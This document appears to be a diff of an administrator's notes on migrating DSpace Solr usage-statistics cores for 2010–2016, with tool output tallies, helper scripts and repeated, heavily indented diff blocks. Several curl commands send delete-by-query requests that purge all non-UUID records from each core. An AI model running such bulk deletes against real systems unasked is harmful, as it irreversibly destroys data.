                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2016
                                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                +           1,765,924    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                +           1,151,575    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             187,110    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                +              51,204    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             347,382    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +              66,605    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +             620,298    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                                +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                +           4,190,098    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                • 849,408: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                                • 627,747: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 1,477,155: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 1,469,706 are type: 5 (SITE) so we can purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2016/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2015

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2016/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                +
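The counts listed before each purge can be checked against Solr before the delete is sent. For statistics-2016 the two sub-counts add up as expected: 849,408 + 627,747 = 1,477,155. Below is a minimal sketch of that check, assuming the same host and port as the commands above and a Solr that answers `select` with `wt=json`. The helper names `num_found`, `solr_count`, and `delete_payload` are hypothetical and are not part of DSpace or Solr.

```shell
#!/usr/bin/env bash
# Hypothetical helpers for illustration; host and port follow the commands in these notes.
SOLR_BASE="${SOLR_BASE:-http://localhost:8081/solr}"

# Extract the numFound value from a Solr JSON response read on stdin.
num_found() {
    grep -o '"numFound": *[0-9]*' | head -n 1 | tr -dc '0-9'
}

# Count the documents in a core that match a query.
# rows=0 asks Solr for the hit count only, without returning documents.
solr_count() {
    local core="$1" query="$2"
    curl -s -G "$SOLR_BASE/$core/select" \
        --data-urlencode "q=$query" \
        --data-urlencode "rows=0" \
        --data-urlencode "wt=json" | num_found
}

# Build the XML body for a delete-by-query request.
# Assumes the query contains no XML special characters (<, >, &).
delete_payload() {
    printf '<delete><query>%s</query></delete>' "$1"
}
```

With a running Solr, `solr_count statistics-2016 '*:* NOT id:/.{36}/'` could be compared with the expected total first, and the output of `delete_payload` passed to `curl --data-binary` only if the numbers agree.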

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2015

                                                                                                                                                                                                                                                                                                                                                                                                                                Processing the statistics-2015 core:

                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2015
                                                                                                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                -             990,916    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             506,070    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             116,153    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                -              33,282    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                -              21,062    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                                -              10,788    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                                -              52,107    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                                -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                -           1,730,378    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of stats after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2015
                                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                +             990,916    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             506,070    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             116,153    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                +              33,282    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                +              21,062    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +              10,788    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +              52,107    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                                +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                +           1,730,378    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of stats after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                • 195,293: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                                • 67,146: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 262,439: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 247,400 are type: 5 (SITE) so we can purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2015/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2014

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2015/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                +
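As a quick sanity check on the statistics-2015 figures above: the first two queries match disjoint sets of documents, so their counts should add up to the count for `*:* NOT id:/.{36}/`. A minimal sketch using only the numbers reported in these notes (the variable names are illustrative, not part of any DSpace or Solr tooling):

```shell
# Counts copied from the statistics-2015 summary above
not_uuid_not_unmigrated=195293   # (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
unmigrated=67146                 # id:/.+-unmigrated/
total_not_uuid=262439            # *:* NOT id:/.{36}/

# The first two sets are disjoint, so their sum should equal the third count
sum=$((not_uuid_not_unmigrated + unmigrated))
echo "sum=$sum expected=$total_not_uuid"
```

The same check can be repeated for any other core by substituting that core's three counts.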

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2014

                                                                                                                                                                                                                                                                                                                                                                                                                                Processing the statistics-2014 core:

                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2014
                                                                                                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                -           2,381,603    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                -           1,323,357    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             501,545    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             247,805    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                -                 250    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                                -                 188    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                                -                  50    Item Search
                                                                                                                                                                                                                                                                                                                                                                                                                                -              10,918    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                                -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                -           4,465,716    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated documents after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2014
                                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                +           2,381,603    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                +           1,323,357    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             501,545    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             247,805    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                +                 250    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +                 188    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +                  50    Item Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +              10,918    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                                +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                +           4,465,716    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated documents after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                • 182,131: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                                • 39,947: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 222,078: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 188,791 are type: 5 (SITE) so we can purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2014/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2013

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2014/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                +
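Before running a delete-by-query like the one above, it can help to count how many documents the query matches. Note that `*:* NOT id:/.{36}/` matches every document whose id is not exactly 36 characters long, not only the type 5 (SITE) ones. The following is a minimal sketch, assuming the same Solr base URL and core name as in the notes. The function names `delete_payload`, `count_matches`, and `purge_matches` and the `RUN` guard variable are hypothetical helpers for illustration, not part of DSpace or Solr.

```shell
#!/usr/bin/env bash
# Base URL, core, and query are copied from the notes above.
solr="http://localhost:8081/solr"
core="statistics-2014"
query='*:* NOT id:/.{36}/'

# Build the XML body for a delete-by-query, escaping XML special characters.
delete_payload() {
    printf '<delete><query>%s</query></delete>' \
        "$(printf '%s' "$1" | sed -e 's/&/\&amp;/g' -e 's/</\&lt;/g' -e 's/>/\&gt;/g')"
}

# Ask Solr how many documents match, without returning any of them (rows=0).
# The count is the "numFound" value in the JSON response.
count_matches() {
    curl -s -G "$solr/$1/select" \
        --data-urlencode "q=$2" \
        --data-urlencode "rows=0" \
        --data-urlencode "wt=json"
}

# Same request as the purge command in the notes.
purge_matches() {
    curl -s "$solr/$1/update?softCommit=true" \
        -H "Content-Type: text/xml" \
        --data-binary "$(delete_payload "$2")"
}

# Hypothetical guard: only contact Solr when RUN=1 is set explicitly.
if [ "${RUN:-0}" = "1" ]; then
    count_matches "$core" "$query"
    # purge_matches "$core" "$query"   # uncomment once the count looks right
fi
```

Running the script with `RUN=1` only prints the count. The purge line stays commented out until the number has been compared with the summary above.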

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2013

                                                                                                                                                                                                                                                                                                                                                                                                                                Processing the statistics-2013 core:

                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2013
                                                                                                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                -           2,352,124    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                -           1,117,676    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             575,711    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             171,639    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                -                 248    Item Search
                                                                                                                                                                                                                                                                                                                                                                                                                                -                   7    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                                -                   5    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                                -               1,452    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                                -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                -           4,218,862    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated docs after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2013
                                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                +           2,352,124    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                +           1,117,676    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             575,711    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             171,639    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                +                 248    Item Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +                   7    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +                   5    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +               1,452    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                                +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                +           4,218,862    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated docs after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                • 2,548 : (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                                • 29,772: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 32,320: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 15,691 are type: 5 (SITE) so we can purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2013/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2012

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2013/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                +
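The summary counts can be cross-checked with simple arithmetic: the documents without a 36-character id should equal the `-unmigrated` documents plus the remaining legacy-id documents. This is a small sketch using the figures from the notes. The helper names `to_int` and `sums_to` are made up for illustration.

```shell
#!/usr/bin/env bash
# Strip thousands separators so the figures can be used in shell arithmetic.
to_int() {
    printf '%s' "$1" | tr -d ','
}

# Succeed if the remaining arguments add up to the first argument.
sums_to() {
    local expected total=0 n
    expected=$(to_int "$1")
    shift
    for n in "$@"; do
        total=$(( total + $(to_int "$n") ))
    done
    [ "$total" -eq "$expected" ]
}

# statistics-2014: 182,131 + 39,947 should equal 222,078
sums_to 222,078 182,131 39,947 && echo "statistics-2014 summary is consistent"

# statistics-2013: 2,548 + 29,772 should equal 32,320
sums_to 32,320 2,548 29,772 && echo "statistics-2013 summary is consistent"
```

Both checks pass with the numbers recorded above, so the three queries in each summary agree with one another.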

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2012

                                                                                                                                                                                                                                                                                                                                                                                                                                Processing the statistics-2012 core:

                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2012
                                                                                                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                -           2,229,332    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             913,577    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             215,577    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             104,734    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                -           3,463,220    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated docs after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2012
                                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                +           2,229,332    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             913,577    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             215,577    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             104,734    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                +           3,463,220    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated docs after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                • 0: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                                • 33,161: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 33,161: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 33,161 are type: 3 (COLLECTION), which is different than I’ve seen previously… but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2011

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                +
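A minimal sketch of the purge step above, assuming one wants to count the matching records before deleting them. The Solr base URL, the core names and the `*:* NOT id:/.{36}/` query come from the commands in these notes; the helper names `count_url` and `delete_request` are hypothetical, and the sketch only builds the requests rather than sending them. Lucene regular expressions match the whole term, so `id:/.{36}/` selects ids that are exactly 36 characters long (the length of a UUID), and the negated query selects everything else.

```python
from urllib.parse import urlencode
from xml.sax.saxutils import escape

# Base URL and query taken from the curl commands in these notes.
SOLR_BASE = "http://localhost:8081/solr"
UNMIGRATED_QUERY = "*:* NOT id:/.{36}/"


def count_url(core, query=UNMIGRATED_QUERY):
    """Build a select URL that returns only the hit count (rows=0).

    The count is in response.numFound of the JSON reply.
    Hypothetical helper, not part of DSpace or Solr.
    """
    params = urlencode({"q": query, "rows": 0, "wt": "json"})
    return f"{SOLR_BASE}/{core}/select?{params}"


def delete_request(core, query=UNMIGRATED_QUERY):
    """Build the URL and XML body for a delete-by-query with a soft commit.

    The query is XML-escaped so characters such as & or < cannot break the body.
    Hypothetical helper, not part of DSpace or Solr.
    """
    url = f"{SOLR_BASE}/{core}/update?softCommit=true"
    body = f"<delete><query>{escape(query)}</query></delete>"
    return url, body


if __name__ == "__main__":
    for core in ("statistics-2012", "statistics-2011"):
        print(count_url(core))
        url, body = delete_request(core)
        print(url)
        print(body)
```

The body would be posted with `Content-Type: text/xml`, as in the curl commands. Checking that `numFound` from the count request agrees with the "unmigrated" summary first is a cheap guard against deleting from the wrong core.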

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2011

                                                                                                                                                                                                                                                                                                                                                                                                                                Processing the statistics-2011 core:

                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2011
                                                                                                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                -             904,896    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             385,789    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             154,356    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                -              62,978    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                -           1,508,019    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated docs after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2011
                                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                +             904,896    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             385,789    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             154,356    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                +              62,978    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                +           1,508,019    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated docs after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                • 0: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                                • 17,551: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 17,551: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 12,116 are type: 3 (COLLECTION), which is different than I’ve seen previously… but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2011/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2010

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2011/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2010

                                                                                                                                                                                                                                                                                                                                                                                                                                Processing the statistics-2010 core:

                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2010
                                                                                                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                -              26,067    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                -              15,615    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                -               4,116    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                -               1,094    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                -              46,892    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated docs after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2010
                                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                +              26,067    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                +              15,615    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                +               4,116    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                +               1,094    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                +              46,892    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +

